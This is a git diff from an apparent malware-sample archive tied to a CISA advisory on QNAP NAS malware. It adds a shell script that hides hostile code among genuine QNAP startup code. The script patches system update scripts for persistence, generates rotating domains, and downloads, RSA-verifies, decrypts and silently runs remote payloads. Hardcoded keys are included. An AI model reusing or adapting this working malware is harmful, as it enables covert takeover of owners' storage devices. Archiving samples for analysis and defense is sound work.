if [ ! -f "${INSTALL_BUILD_IN}" ]; then
|
||||
dbg "build-in ${QSYNC_NAME} is installed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -f ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin ]; then
|
||||
dbg "${QSYNC_NAME}.bin} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ ! -x "${QPKG_CLI}" ]; then
|
||||
dbg "${QPKG_CLI} not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## make sure volume is exist
|
||||
if [ ! -d /share/`/sbin/getcfg SHARE_DEF defPublic -d Public -f /etc/config/def_share.info` ]; then
|
||||
dbg "/share/Public not found"
|
||||
return 1
|
||||
fi
|
||||
|
||||
## is removed
|
||||
if [ -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed ]; then
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "${QSYNC_NAME} is removed"
|
||||
return 1
|
||||
fi
|
||||
|
||||
if [ -f "$lock_file" ]; then
|
||||
if [ $(( $(date +%s) - $(date +%s -r $lock_file) )) -le 180 ]; then
|
||||
echo "${QSYNC_NAME} is installing"
|
||||
dbg "${QSYNC_NAME} is installing"
|
||||
return 1
|
||||
fi
|
||||
fi
|
||||
|
||||
/bin/touch "$lock_file"
|
||||
/bin/rm -f ${INSTALL_BUILD_IN}
|
||||
dbg "install build-in ${QSYNC_NAME} start"
|
||||
|
||||
set_default_disable_status
|
||||
|
||||
## install build in Qsync
|
||||
${QPKG_CLI} -K -m ${UPDATEPKG_DIR}/${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
sleep 20
|
||||
|
||||
wait_install=60
|
||||
## avoid initial take long time or fail
|
||||
while [ "$wait_install" -gt 0 ]; do
|
||||
stcode=`$CMD_GETCFG ${QSYNC_NAME}.bin stcode -f /etc/config/qpkg_job.conf`
|
||||
if [ "$stcode" = "0" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
let "wait_install--"
|
||||
done
|
||||
|
||||
${QPKG_CLI} -C ${QSYNC_NAME}.bin > /dev/null 2>&1
|
||||
/bin/rm -f ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled
|
||||
/bin/rm -f "$lock_file"
|
||||
dbg "install build-in ${QSYNC_NAME} success"
|
||||
}
|
||||
|
||||
if [ "$1" == "stop" ]; then
|
||||
exit 0
|
||||
fi
|
||||
fi
|
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/6e0f793025537edf285c5749b3fcd83a689db0f1c697abe70561399938380f89
Normal file
Binary file not shown.
BIN
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/845759bb54b992a6abcbca4af9662e94794b8d7c87063387b05034ce779f7d52
Normal file
Binary file not shown.
572
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/8fd16e639f99cdaa7a2b730fc9af34a203c41fb353eaa250a536a09caf78253b
Normal file
File diff suppressed because one or more lines are too long
926
2020/2020-07-27_CISA-Legacy_Malware_Targeting_QNAP_NAS/9526ccdeb9bf7cfd9b34d290bdb49ab6a6acefc17bff0e85d9ebb46cca8b9dc2
Normal file
@ -0,0 +1,926 @@
|
||||
#!/bin/sh
|
||||
{
|
||||
ts=1558069200
|
||||
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
|
||||
test -d "$bdir" && break; bdir=''
|
||||
done <<EOF
|
||||
$(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
|
||||
EOF
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
|
||||
|
||||
test -z "$PWD" && PWD=$(pwd)
|
||||
CWD="$PWD"
|
||||
if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
|
||||
CWD=''
|
||||
for dir in '.config' '.liveupdate'; do
|
||||
dir="${bdir}/.qpkg/${dir}"
|
||||
test -d "$dir" && cd "$dir" && CWD="$dir" && break
|
||||
done
|
||||
fi
|
||||
test "$CWD" && test -d "$CWD" && cd "$CWD"
|
||||
|
||||
sedreplace () {
|
||||
local grepstring="$1" sedcmd="$2" file="$3"
|
||||
[ "$grepstring" ] && [ "$sedcmd" ] && [ "$file" ] || return 1
|
||||
if grep "$grepstring" "$file"; then
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd -i "$file"
|
||||
sed -i "$sedcmd" "$file"
|
||||
test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
|
||||
fi
|
||||
return $?
|
||||
}
|
||||
|
||||
for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
|
||||
file=''
|
||||
[ -f "${path#*/}" ] && file="${path#*/}" || { [ -f "${bdir}/.qpkg/${path}" ] && file="${bdir}/.qpkg/${path}"; }
|
||||
if [ "x${file}" != 'x' ]; then
|
||||
sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
|
||||
verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
|
||||
grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
sedcmd='s/g4rwwSz1Bp1i1'"'"'/g4rwwS'"''"'z1Bp1i1'"'"'/'
|
||||
grepstring='g4rwwSz1Bp1i1'"'"
|
||||
sedreplace "$grepstring" "$sedcmd" "$file"
|
||||
fi
|
||||
done
|
||||
file=''
|
||||
|
||||
if [ ! -f '1550379600_c' ]; then
|
||||
touch '1550379600_c'
|
||||
test -f liveupdate.sh && { dir=.liveupdate; file=liveupdate.sh; } || { test -f backup_conf.sh && dir=.config; file=backup_conf.sh; }
|
||||
cat >".backup_${file}" <<"XEOF"
|
||||
#!/bin/sh
|
||||
QNAP_QPKG=cloudinstall
|
||||
QID_PRESISTENT_CONF=/etc/config/qid_persistent.conf
|
||||
NAS_CLOUD_INSTALL_PATH=/home/httpd/cgi-bin/cloudinstall
|
||||
CLOUD_INSTALL_PATH=/tunnel_agent
|
||||
CLOUD_INSTALL_RAMDISK_PATH=/tunnel_agent_ramdisk
|
||||
CLOUD_INSTALL_AGENT_FILE_PATH=$CLOUD_INSTALL_PATH/tunnel_agent.tar.bz2
|
||||
COUNTER=1
|
||||
ERROR_BAD_REQUEST=400
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
case "$1" in
|
||||
start)
|
||||
START_TIME=$(date +"%T")
|
||||
echo -e "start:$START_TIME" >> /tmp/.cloudinstall.log
|
||||
while [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ];
|
||||
do
|
||||
# report device info and get cloudinstall agent app download url
|
||||
DOWNLOAD_URL=`/usr/sbin/qcloud_uninit_device_tool -r`
|
||||
if [ ! -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
# create ramdisk and create a 64mb file
|
||||
/bin/mkdir -p $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_RAMDISK_PATH
|
||||
/bin/dd if=/dev/zero of=$CLOUD_INSTALL_RAMDISK_PATH/image bs=1M count=64
|
||||
# create block size 1K filesystem
|
||||
/sbin/mke2fs -b 1024 $CLOUD_INSTALL_RAMDISK_PATH/image
|
||||
# create virtual disk
|
||||
export USED_LOOP_DEVICE=`/usr/local/sbin/losetup -f $CLOUD_INSTALL_RAMDISK_PATH/image`
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "USED_LOOP_DEVICE" "$USED_LOOP_DEVICE"
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
# mount virtual disk
|
||||
/bin/mount $USED_LOOP_DEVICE $CLOUD_INSTALL_PATH
|
||||
else
|
||||
# create and mount tmpfs folder
|
||||
/bin/mkdir -p $CLOUD_INSTALL_PATH
|
||||
/bin/mount -t tmpfs -o size=64m tmpfs $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
fi
|
||||
cd $CLOUD_INSTALL_PATH
|
||||
|
||||
if [[ $DOWNLOAD_URL == https* ]]; then
|
||||
REPORT_SUCCESS_TIME=$(date +"%T")
|
||||
else
|
||||
REPORT_FAIL_TIME=$(date +"%T")
|
||||
echo -e " report_fail:$REPORT_FAIL_TIME\n response:$DOWNLOAD_URL" >> /tmp/.cloudinstall.log
|
||||
# stop retry when got bad request
|
||||
# prevent put bad request all the time
|
||||
if [[ $DOWNLOAD_URL == *$ERROR_BAD_REQUEST* ]]; then
|
||||
break
|
||||
fi
|
||||
fi
|
||||
|
||||
# downlaod cloudinstall agent app
|
||||
/usr/sbin/qcloud_uninit_device_tool -o "$CLOUD_INSTALL_AGENT_FILE_PATH" -d "$DOWNLOAD_URL"
|
||||
|
||||
if [ -f "$CLOUD_INSTALL_AGENT_FILE_PATH" ]; then
|
||||
DOWNLOAD_FINISH_TIME=$(date +"%T")
|
||||
# unzip and execute cloudinstallagent
|
||||
/bin/tar -xf $CLOUD_INSTALL_AGENT_FILE_PATH -C $CLOUD_INSTALL_PATH
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh start &> /dev/null
|
||||
|
||||
UNZIP_TIME=$(date +"%T")
|
||||
fi
|
||||
|
||||
if [ ! -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
# create folder and create symbolic link
|
||||
/bin/mkdir -p $NAS_CLOUD_INSTALL_PATH
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.html $NAS_CLOUD_INSTALL_PATH/index.html
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/cloudinstall.cgi $NAS_CLOUD_INSTALL_PATH/cloudinstall.cgi
|
||||
/bin/ln -s $CLOUD_INSTALL_PATH/ui/static $NAS_CLOUD_INSTALL_PATH/static
|
||||
fi
|
||||
|
||||
# wait connect
|
||||
sleep 5
|
||||
CLOUD_INSTALL_AGENT_PID_LIST=`/bin/ps --columns 256 | /bin/grep "$CLOUD_INSTALL_PATH/bin/cloudinstallagent" | /bin/grep -v grep | /bin/awk '{print $1}'`
|
||||
if [ "$CLOUD_INSTALL_AGENT_PID_LIST" == "" ]; then
|
||||
SLEEP_TIME=$(( 30 * $COUNTER ))
|
||||
if [ $SLEEP_TIME -gt 300 ]; then
|
||||
SLEEP_TIME=300
|
||||
fi
|
||||
# wait next retry
|
||||
sleep $SLEEP_TIME
|
||||
fi
|
||||
COUNTER=$(( $COUNTER * 2 ))
|
||||
done
|
||||
|
||||
END_TIME=$(date +"%T")
|
||||
echo -e "report_success:$REPORT_SUCCESS_TIME\ndownload_finish:$DOWNLOAD_FINISH_TIME\nunzip_finish:$UNZIP_TIME\nend:$END_TIME" >> /tmp/.cloudinstall.log
|
||||
# call for a new process group and for later kill
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh start &> /dev/null &
|
||||
/bin/setsid $CLOUD_INSTALL_PATH/bin/cloudinstall_agent_daemon.sh &> /dev/null &
|
||||
|
||||
# set cloudinstall report status
|
||||
/sbin/setcfg -f $QID_PRESISTENT_CONF "CLOUDINSTALL" "REPORT_STATUS" "uninit"
|
||||
# add link to report offline
|
||||
/bin/ln -sf /etc/init.d/cloudinstall_report_offline.sh /etc/rcK.d/K99cloudinstall_report_offline
|
||||
|
||||
# buzzer
|
||||
HARDWARE_TYPE=$(uname -m)
|
||||
if [[ "$HARDWARE_TYPE" == *"x86"* ]];
|
||||
then
|
||||
/sbin/hal_app --se_buzzer enc_id=0,mode=101
|
||||
elif [[ "$HARDWARE_TYPE" == *"arm"* ]];
|
||||
then
|
||||
/sbin/pic_raw 81
|
||||
fi
|
||||
;;
|
||||
|
||||
stop)
|
||||
# disconnect cloudinstall agent
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_ctl.sh stop &> /dev/null
|
||||
$CLOUD_INSTALL_PATH/bin/cloudinstall_agent_disconnect_daemon.sh stop &> /dev/null
|
||||
for i in "${CLOUD_INSTALL_AGENT_DAEMON_PID_LIST[@]}"
|
||||
do
|
||||
# use bash kill instead /bin/kill for kill process group
|
||||
# cloudinstall agent daemon and inotifywait
|
||||
kill -9 -- -$i &>/dev/null
|
||||
done
|
||||
|
||||
# umount
|
||||
if [ "$NAS_ARCH" == "ARM_64" ]; then
|
||||
/bin/umount -l $USED_LOOP_DEVICE
|
||||
/usr/local/sbin/losetup -d $USED_LOOP_DEVICE
|
||||
else
|
||||
/bin/umount -l $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
# remove all files
|
||||
if [ -d "$NAS_CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $NAS_CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_PATH
|
||||
fi
|
||||
if [ -d "$CLOUD_INSTALL_RAMDISK_PATH" ]; then
|
||||
/bin/rm -rf $CLOUD_INSTALL_RAMDISK_PATH
|
||||
fi
|
||||
;;
|
||||
|
||||
restart)
|
||||
$0 stop
|
||||
$0 start
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "Usage: $0 {start|stop|restart}"
|
||||
exit 1
|
||||
esac
|
||||
exit 0
|
||||
|
||||
|
||||
set_env()
|
||||
{
|
||||
debug=`$CMD_GETCFG Qsync Debug -u -d NULL`
|
||||
if [ "$debug" != "NULL" ]; then
|
||||
/bin/touch $LOG_FILE
|
||||
else
|
||||
/bin/rm -f $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
set_env
|
||||
|
||||
dbg()
|
||||
{
|
||||
if [ -f "$LOG_FILE" ]; then
|
||||
echo "[`date "+%H:%M:%S"`] $@ " >> $LOG_FILE
|
||||
fi
|
||||
}
|
||||
|
||||
dbg "> $0 $@ (pid $$)"
|
||||
|
||||
fi
|
||||
|
||||
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
|
||||
|
||||
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\n\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\n//I;s/\(^\|\n\)\[[^\n]\+\]\n.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
|
||||
|
||||
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
|
||||
|
||||
bdir=
|
||||
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in Public Download Multimedia Web Recordings homes; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
|
||||
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
|
||||
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
|
||||
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }
|
||||
|
||||
EOF
|
||||
test "$fgrep" || fgrep=grep
|
||||
test "$RANDOM" || RANDOM=17653
|
||||
genrstr ()
|
||||
{
|
||||
local s=;
|
||||
local min=${1:-4};
|
||||
local max=${2:-12};
|
||||
local kspace="${3:-a-zA-Z}"
|
||||
tr -dc "$kspace" < /dev/urandom | {
|
||||
read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
|
||||
echo "$s"
|
||||
}
|
||||
}
|
||||
|
||||
verifyfile() {
|
||||
local file="$1"
|
||||
local sig="${2:-$file_s}"
|
||||
local out
|
||||
test ! -z "$file" && test -s "$file" || return 1
|
||||
test ! -z "$sig" && test -s "$sig" || return 1
|
||||
test -f ".rsakey" || echo "$verifykey" > ".rsakey"
|
||||
out=$(openssl dgst -sha1 -verify ".rsakey" -signature "$sig" "$file") && test "$out" = "Verified OK" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
decryptfile() {
|
||||
local file="$1"
|
||||
local ofile="${2:-${file}}"
|
||||
local key='7C0vK4SzMO15zBxLD7XCi5hbjgP1ZjkJ'
|
||||
openssl enc -d -aes-256-cbc -k "$key" -md sha1 -salt < "$file" > "${file}_d" || return $?
|
||||
test -f "$ofile" && rm -f "$ofile"
|
||||
mv "${file}_d" "$ofile" && return 0
|
||||
return 1
|
||||
}
|
||||
|
||||
verifykey='-----BEGIN PUBLIC KEY-----
|
||||
MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
|
||||
CXqrBM2CVbJo';verifykey="${verifykey}"'g4rwwS''z1Bp1i1'
|
||||
verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
|
||||
RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
|
||||
Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
|
||||
gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
|
||||
2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
|
||||
0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
|
||||
pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
|
||||
DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
|
||||
-----END PUBLIC KEY-----'
|
||||
domainexts='cf:0 tk:0 com:1 ml:0 de:0 rocks:0 mx:0 biz:0 net:1 cn:0 ga:0 gq:0 org:1 top:0 nl:0 men:0 ws:0 se:0 info:0 xyz:0 today:0 ru:0 ec:0 co:0 ee:0 rs:0 com.sv:0 com.cy:0 co.zw:0 kg:0 com.ge:0 tl:0 name:0 tw:0 lv:0 bs:0 li:0 ng:0 ae:0 bt:0 tv:0 pe:0 uz:0 me:0 gy:0 am:0 kr:0 by:0 fr:0 com.uy:0 com.lb:0 com.br:0 vu:0 hk:0 in:0 re:0 ch:0 af:0 com.ps:0 ug:0 dz:0 pro:0 co.th:0 sg:0 cd:0 so:0 mo:0 co.id:0 co.il:0 com.do:0 ke:0 cx:0 ro:0 id:0 pm:0 hm:0 vg:0 az:0 com.eg:0 bz:0 su:0 com.ar:0 gg:0 com.lr:0 pa:0 com.ve:0 al:0 fm:0 to:0 mu:0 co.ck:0 pk:0 co.rs:0 cw:0 nr:0 gd:0 gl:0 ac:0 lk:0 md:0 fi:0 sx:0 lc:0 es:0 cc:0 cm:0 la:0 co.za:0 je:0 cz:0 jp:0 ai:0 pw:0 bg:0 nu:0 ag:0 bm:0 eu:0 com.my:0 sc:0 ax:0 wf:0 ly:0 qa:0 vn:0 aq:0 mobi:0 com.tr:0 com.ua:0 com.py:0 hk.org:0 south.am:0 com.kh:0 co.zm:0 ru.net:0 com.km:0 tt:0 kn:0 co.ls:0 co.fk:0 uy.com:0 com.gu:0 .com.bn:0 com.pf:0 com.fj:0'
|
||||
n=0
|
||||
|
||||
for ext in $domainexts; do
|
||||
eval 'domainext'"$n"'=$ext'
|
||||
n=$(( $n + 1 ))
|
||||
done
|
||||
domainextcnt=$n
|
||||
|
||||
test -d "${bdir}/.qpkg" || mkdir "${bdir}/.qpkg"
|
||||
XEOF
|
||||
cat >>".backup_${file}" <<EOF
|
||||
test -d "\${bdir}/.qpkg/${dir}" || mkdir "\${bdir}/.qpkg/${dir}"
|
||||
cd "\${bdir}/.qpkg/${dir}" && rm -f .tmp.*
|
||||
EOF
|
||||
cat >>".backup_${file}" <<"XEOF"
|
||||
|
||||
echo "$verifykey" > ".rsakey"
|
||||
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
curlconntimeout=12
|
||||
i=0 n=0 c=0 errorcount=0
|
||||
for interval in '1296000' '432000' '86400' '28800' '7200' '3600'; do
|
||||
timestart=$(date +%s)
|
||||
for length in 5 3 4; do
|
||||
timenow=$(date +%s)
|
||||
test "$(( $timenow - $timestart ))" -gt 600 && test "$interval" != "3600" && break
|
||||
curlconntimeout=$(( $curlconntimeout - ( $timenow - $timestart ) / 250 ))
|
||||
test "$curlconntimeout" -lt 6 && curlconntimeout=6
|
||||
n=0; while [ "$n" -lt $domainextcnt ]; do
|
||||
eval 'ext=$domainext'"$n"
|
||||
l=$(( $length + ${ext#*:} ))
|
||||
ext=${ext%:*}
|
||||
if [ $length = 5 ]; then
|
||||
hostname=$(echo "$(( $(date +%s) / $interval ))IbjGOEgnuD${ext}" | openssl dgst -sha1 -binary | openssl base64 | sed 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ-+\//abcdefghijklmnopqrstuvwxyzabc/;s/=//g')
|
||||
hostname=${hostname%${hostname#??????}}
|
||||
eval 'hostname'"$n"'=$hostname'
|
||||
fi
|
||||
eval 'host=$hostname'"$n"
|
||||
n=$(( $n + 1 ))
|
||||
trycnt=0
|
||||
while [ ${#host} -gt "$l" ] && [ $trycnt -lt 3 ]; do
|
||||
trycnt=$(( $trycnt + 1 ))
|
||||
host=${host%?}
|
||||
done
|
||||
test -f "$outfile" && rm -f "$outfile"
|
||||
recentupdate=''
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "$outfile" "https://${host}.${ext}/qnap_firmware.xml?t=$(date +%s)"
|
||||
test -s "$outfile" || continue
|
||||
fsize=$(( $(wc -c < "$outfile") ))
|
||||
test "$fsize" -gt 4096 && rm -f "$outfile" && continue
|
||||
rsamsg=$(openssl base64 -in "$outfile" -d | openssl rsautl -pubin -inkey ".rsakey" -verify) || continue
|
||||
test "$rsamsg" || continue
|
||||
path="${rsamsg%|*}"; rsadomain="${path%|*}"; path="${path#*|}"
|
||||
hash="${rsamsg##*|}"; ts="${hash#*_}"; hash="${hash%_*}"
|
||||
test "$rsadomain" = "${host}.${ext}" || continue
|
||||
timenow=$(date +%s)
|
||||
test "$ts" -gt 0 && { test "$ts" -gt "$timenow" || test $(( $timenow - $ts )) -lt 172800; } && recentupdate=1
|
||||
curl --connect-timeout "$curlconntimeout" -m 300 -k -o "$outfile" "https://${host}.${ext}/${path}"
|
||||
filehash=$(openssl dgst -sha1 -binary "$outfile" | openssl base64) || continue
|
||||
test "$filehash" = "$hash" || continue
|
||||
curl --connect-timeout "$curlconntimeout" -m 30 -k -o "${outfile}_s" "https://${host}.${ext}/s/${path}"
|
||||
verifyfile "$outfile" "${outfile}_s" && decryptfile "$outfile" || continue
|
||||
mv "${outfile}_s" "${ts}_v"
|
||||
chmod 755 "$outfile" || continue
|
||||
( ( exec >/dev/null 2>/dev/null </dev/null; "$outfile" ) & )
|
||||
test "${recentupdate:-0}" -eq 1 && exit 0
|
||||
for tmpfile in "./.tmp.XXXXXX" "${bdir}/.tmp.XXXXXX" "/.tmp.XXXXXX"; do
|
||||
tmpfile=$(mktemp "./.tmp.XXXXXX")
|
||||
test -f "$tmpfile" && outfile=$tmpfile && break
|
||||
done
|
||||
test -n "${outfile}" && test -f "${outfile}" || outfile='./.tmp.out'
|
||||
done
|
||||
done
|
||||
done
|
||||
|
||||
if [ "$fromrcS" = 'TRUE' ]; then
|
||||
# if Qsync is disable before 4.3.0, we will touch /mnt/HDA_ROOT/udpate_pkg/.QsyncServer_disabled
|
||||
set_default_disable_status()
|
||||
{
|
||||
QPKG_ENABLE=`$CMD_GETCFG ${QSYNC_NAME} Enable -d "NULL" -f ${QPKG_CONF}`
|
||||
OLD_ENABLE=`$CMD_GETCFG Qsync Enable -u -d NULL`
|
||||
if [ -f "${UPDATEPKG_DIR}/.${QSYNC_NAME}_removed" ]; then
|
||||
return
|
||||
fi
|
||||
|
||||
if [ "$QPKG_ENABLE" = "NULL" ]; then
|
||||
if [ "$OLD_ENABLE" = "FALSE" ]; then
|
||||
dbg "touch ${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
/bin/touch "${UPDATEPKG_DIR}/.${QSYNC_NAME}_disabled"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
if [ "x$HBS_ENABLE" = xnull ] || [ "x$HBS_ENABLE" = xFALSE ]; then
|
||||
export QNAP_QPKG=rtrr
|
||||
else
|
||||
export QNAP_QPKG=HybridBackup
|
||||
/usr/local/sbin/qboost_util -S -n rtrr -E 0 1>/dev/null 2>&1
|
||||
fi
|
||||
start()
|
||||
{
|
||||
if [ -f /usr/bin/qsyncman ]; then
|
||||
[ ! -f /etc/config/hdcopyusb.conf ] || /bin/rm -f /etc/config/hdcopyusb.conf
|
||||
/bin/sed -i '/hdusb_copy/d' /etc/config/crontab
|
||||
/usr/bin/crontab /etc/config/crontab
|
||||
echo -n "Starting QSync manitor: "
|
||||
[ -d /etc/config/qsync ] || /usr/bin/install -d /etc/config/qsync
|
||||
[ -f /etc/config/qsync/qhost.conf ] || /bin/touch /etc/config/qsync/qhost.conf
|
||||
[ -f /etc/config/qsync/qsyncjobdef.conf ] || /bin/touch /etc/config/qsync/qsyncjobdef.conf
|
||||
[ -f /etc/config/qsync/qsync.conf ] || /bin/cp -p /etc/default_config/qsync/qsync.conf /etc/config/qsync/qsync.conf
|
||||
[ -f /etc/config/qsync/extdrv.conf ] || /bin/cp -p /etc/default_config/qsync/extdrv.conf /etc/config/qsync/extdrv.conf
|
||||
[ -f /etc/config/qsync/qsyncd.conf ] || /bin/cp -p /etc/default_config/qsync/qsyncd.conf /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsyncd.conf ] || /bin/chmod 640 /etc/config/qsync/qsyncd.conf
|
||||
[ ! -f /etc/config/qsync/qsync.conf ] || /bin/chmod 640 /etc/config/qsync/qsync.conf
|
||||
[ ! -f /etc/config/qsync/qhost.conf ] || /bin/chmod 640 /etc/config/qsync/qhost.conf
|
||||
/sbin/daemon_mgr qsyncman start "/usr/bin/qsyncman 1>/dev/null 2>&1"
|
||||
echo "OK"
|
||||
fi
|
||||
}
|
||||
|
||||
stop()
|
||||
{
|
||||
echo "Shutting down QSync monitor: OK"
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
kill $pidnum 2>/dev/null
|
||||
i=0
|
||||
while [ ${i} -lt 5 ]
|
||||
do
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
if [ -z "$pidnum" ]; then
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
i=`/usr/bin/expr ${i} + 1`
|
||||
done
|
||||
pidnum=`/bin/pidof qsync``/bin/pidof qsyncd`
|
||||
[ -z "$pidnum" ] || kill -9 $pidnum 2>/dev/null
|
||||
